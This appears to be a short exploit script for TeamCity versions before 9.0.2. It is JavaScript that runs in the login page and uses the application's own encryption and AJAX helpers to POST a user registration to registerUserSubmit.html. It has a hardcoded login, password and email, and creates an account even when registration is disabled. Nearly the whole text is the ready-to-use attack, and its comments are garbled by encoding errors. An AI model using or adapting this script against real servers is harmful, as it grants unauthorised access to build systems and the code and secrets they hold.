TeamCity versions prior to 9.0.2 disable registration bypass exploit.
fcb62b72b48409cfdc2655e2eed9a673ab05cc58972b99fe8dd0345c657202bd
var login = 'testuser'; //D>>D3/4D3D,D1/2 D?D3/4D>>ND*D3/4D2DdegNDuD>>N
var password = 'SuperMEgaPa$$'; //D?DdegND3/4D>>N
var email = 'testusername654@mailinater.com'; // email
/* Code */
var b = BS.LoginForm;
var public_key = $F("publicKey");
var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey"));
var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass;
var c = OO.extend(BS.ErrorsAwareListener, {
onDuplicateAccountError: function(b) {
alert(b.firstChild.nodeValue);
},
onMaxNumberOfUserAccountsReachedError: function(b) {
alert(b.firstChild.nodeValue);
},
onCreateUserError: function(b) {
alert(b.firstChild.nodeValue);
},
onCompleteSave: function(c, d, b) {
BS.ErrorsAwareListener.onCompleteSave(c, d, b);
if (!b) {
BS.XMLResponse.processRedirect(d);
}
}
});
BS.ajaxRequest("registerUserSubmit.html", {
method: "post",
parameters: parameters,
onComplete: function(i) {
if (!i.responseXML) {
alert(i.responseText);
} else {
var h = i.responseXML;
var e = BS.XMLResponse.processErrors(h, c);
console.log(i.responseText);
c.onCompleteSave(b, h, e, i.responseText);
}
},
onFailure: function(i) {
console.log(i);
},
onException: function(i, h) {
console.log(i);
}
});